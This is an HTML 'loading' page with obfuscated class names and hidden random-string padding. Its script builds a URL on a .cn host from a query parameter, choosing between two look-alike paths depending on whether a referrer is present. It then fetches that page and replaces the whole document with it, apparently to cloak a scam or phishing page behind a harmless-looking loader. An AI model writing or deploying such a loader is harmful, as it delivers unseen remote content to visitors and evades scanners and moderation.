<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .FFUAnl {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .FFUAnl .B23H5P {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .FFUAnl .content {
            line-height: 50px;
            text-align: center
        }

        .FFUAnl .img {
            width: 100%
        }

        .FFUAnl .ULiSWodXhI {
            text-align: center
        }

        .FFUAnl .ULiSWodXhI span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .FFUAnl .ULiSWodXhI span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .FFUAnl .ULiSWodXhI span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .FFUAnl .ULiSWodXhI span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .FFUAnl .ULiSWodXhI span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .FFUAnl .ULiSWodXhI span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .FFUAnl .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function LI86ONyWRN(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var qfPrK = LI86ONyWRN('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ qfPrK +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ qfPrK +".html?a=share";
		}
		
        sK1cf0=url+"#"+new Date().getTime();
        sK1cf0 && function() {
            $.get(sK1cf0, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>UTdg2UaybA8ANSiytyagbCjaNjwh</span>
<b style='display:none' >rVrgHT3tbZX5UFuVYVEGwPeDcUawyslqAAz5ANfz2aPSJXEMVvwtcqWc73yIvSHpr8ven2aLimPaP4c1v3R</b>
<li style='display:none' >k4fVmL9fcxFa6ra7f6N2pZXTsWK2nCc3yEPu1ckkIVNCEpFy5qGooiVa13jzFML8Y7N9mLbcN9PL5JwFz7SgyioBoE6uHgA5</li>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<div style='display:none'>uEkxnFFWhXueEZVF6bkBJwaCWHuFV6vuTIc4vCrxgbJbKI5J0hYUsPOGDEz238pdyWpxaHZXI0zToukktR</div>
<p  style='display:none'>PXNwuiOviEiHhTXyntQAeDPHfg06DIPwEVH6RVnHt0w</p>
<img  src='' style='display:none'><div class="FFUAnl">
    <div class="B23H5P">
        <div class="ULiSWodXhI">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >ZqOeAy33qBTz</li>
<ul style='display:none' >Ycm8j8rhOmHKFZUGCTv5bJ5ABMpMlCVOLdwtCDIUGLECsrrwsKtQvXgxUYw1F2uXCkHd6BVHBgCqMeUn1wBqSE4Bz1dbN2</ul>
<a  href='#' style='display:none'>yigW2Yu5byOsd9ZrzYsWUTF2pWEJ2dft7aVnrRNTYQQ9NHh7pFcoXYBFsT5E9plZzXmFCTZgY0KobJEvpXA</a>
<span style='display:none'>AaCvYrcIlD2j2AC7sJzJa0luZVuWtyohbuYRUJfEJbLHnjsp</span>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>yigW2Yu5byOsd9ZrzYsWUTF2pWEJ2dft7aVnrRNTYQQ9NHh7pFcoXYBFsT5E9plZzXmFCTZgY0KobJEvpXA</a>
<li style='display:none' >ZqOeAy33qBTz</li></body>
</html>